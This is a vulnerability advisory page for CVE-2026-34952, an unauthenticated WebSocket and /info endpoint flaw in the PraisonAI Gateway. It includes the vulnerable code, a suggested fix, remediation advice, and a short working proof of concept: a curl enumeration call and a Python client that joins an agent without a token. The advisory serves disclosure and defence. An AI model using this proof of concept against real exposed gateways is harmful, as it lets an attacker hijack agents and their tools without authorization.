Skip to main content

Python CVE-2026-34952

CRITICAL
Missing Authentication for Critical Function (CWE-306)
2026-04-01 https://github.com/MervinPraison/PraisonAI GHSA-cfh6-vr3j-qc3g
9.1
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
9.1 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

Lifecycle Timeline

3
Patch released
Apr 02, 2026 - 14:30 nvd
Patch available
Analysis Generated
Apr 02, 2026 - 00:15 vuln.today
CVE Published
Apr 01, 2026 - 23:28 nvd
CRITICAL 9.1

DescriptionGitHub Advisory

Summary

The PraisonAI Gateway server accepts WebSocket connections at /ws and serves agent topology at /info with no authentication. Any network client can connect, enumerate registered agents, and send arbitrary messages to agents and their tool sets.

Details

gateway/server.py:242 (source) -> gateway/server.py:250 (sink)

python
# source -- /info leaks all agent IDs with no auth
async def info(request):
    return JSONResponse({
        "agents": list(self._agents.keys()),
        "sessions": len(self._sessions),
        "clients": len(self._clients),
    })
# sink -- WebSocket accepted unconditionally, no token check
async def websocket_endpoint(websocket: WebSocket):
    await websocket.accept()
    client_id = str(uuid.uuid4())
    self._clients[client_id] = websocket
# processes any message from any client

PoC

bash
# tested on: praisonai==4.5.87 (source install)
# install: pip install -e src/praisonai
# start server:
# python3 -c "import asyncio; from praisonai.gateway.server import WebSocketGateway; asyncio.run(WebSocketGateway(host='127.0.0.1', port=8765).start())" &
# Step 1 - enumerate agents, no auth
curl -s http://127.0.0.1:8765/info
# expected output: {"name":"PraisonAI Gateway","version":"1.0.0","agents":[...],"sessions":0,"clients":0}
# Step 2 - connect to WebSocket, no token
python3 -c "
import asyncio, websockets, json
async def run():
    async with websockets.connect('ws://127.0.0.1:8765/ws') as ws:
        print('Connected with no auth')
        await ws.send(json.dumps({'type': 'join', 'agent_id': 'assistant'}))
        print(await asyncio.wait_for(ws.recv(), timeout=3))
asyncio.run(run())
"
# expected output: Connected with no auth
# {"type": ...} -- server responds, connection accepted

Impact

Any unauthenticated attacker with network access can connect to the WebSocket gateway, enumerate all registered agents via /info, and send arbitrary messages to agents including tool execution, file reads, and API calls. GatewayConfig has an auth_token field that is never enforced in the handler.

Suggested Fix

python
async def websocket_endpoint(websocket: WebSocket):
    token = websocket.query_params.get("token") or \
            websocket.headers.get("Authorization", "").removeprefix("Bearer ")
    if self._config.auth_token and token != self._config.auth_token:
        await websocket.close(code=4001, reason="Unauthorized")
        return
    await websocket.accept()

AnalysisAI

Missing authentication in PraisonAI Gateway 4.5.87 allows remote unauthenticated attackers to hijack AI agent infrastructure via exposed WebSocket endpoints and topology enumeration. The /ws WebSocket endpoint and /info REST endpoint accept connections without token validation, enabling arbitrary message injection to registered agents and their tool sets. While the GatewayConfig includes an auth_token field, the implementation never enforces it. Publicly available exploit code exists with concrete proof-of-concept demonstrating unauthenticated connection and agent enumeration. EPSS data not available for this recent CVE, but the network-accessible attack vector (AV:N), low complexity (AC:L), and zero authentication requirement (PR:N) combined with working POC code create immediate risk for exposed instances.

Technical ContextAI

PraisonAI Gateway is a Python-based WebSocket orchestration layer for multi-agent AI systems (pkg:pip/praisonai). The vulnerability stems from CWE-306 (Missing Authentication for Critical Function) in gateway/server.py where two endpoints handle client connections: the HTTP /info endpoint exposes complete agent topology metadata (agent IDs, session counts, client counts) as JSON with no access controls, while the /ws WebSocket endpoint calls websocket.accept() unconditionally before any credential checks. Although the GatewayConfig data structure includes an auth_token field for bearer token authentication, the websocket_endpoint handler performs no validation against this token-neither from query parameters nor Authorization headers. This allows any network client to establish a WebSocket session, join agent channels using discovered agent_id values from /info, and send arbitrary JSON payloads that trigger tool execution, file system operations, and external API calls within the agent runtime environment.

RemediationAI

Apply the vendor-recommended authentication fix to gateway/server.py by modifying the websocket_endpoint async function to validate bearer tokens before accepting WebSocket connections. The patch implementation should extract tokens from either the query parameter 'token' or the Authorization header (stripping 'Bearer ' prefix), compare against GatewayConfig.auth_token, and close the connection with code 4001 if validation fails or if auth_token is configured but no valid token is provided. Organizations should immediately review network exposure of PraisonAI Gateway instances and implement firewall rules restricting access to TCP port 8765 (default) from trusted IP ranges only until patching is complete. Verify that GatewayConfig specifies a strong auth_token value in deployment configurations post-patch. Monitor WebSocket connection logs for unauthorized access attempts by reviewing client_id assignments and agent join requests from unexpected sources. Consult the official security advisory at https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-cfh6-vr3j-qc3g for updated patch releases and additional mitigation guidance from the maintainer.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

CVE-2026-34952 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy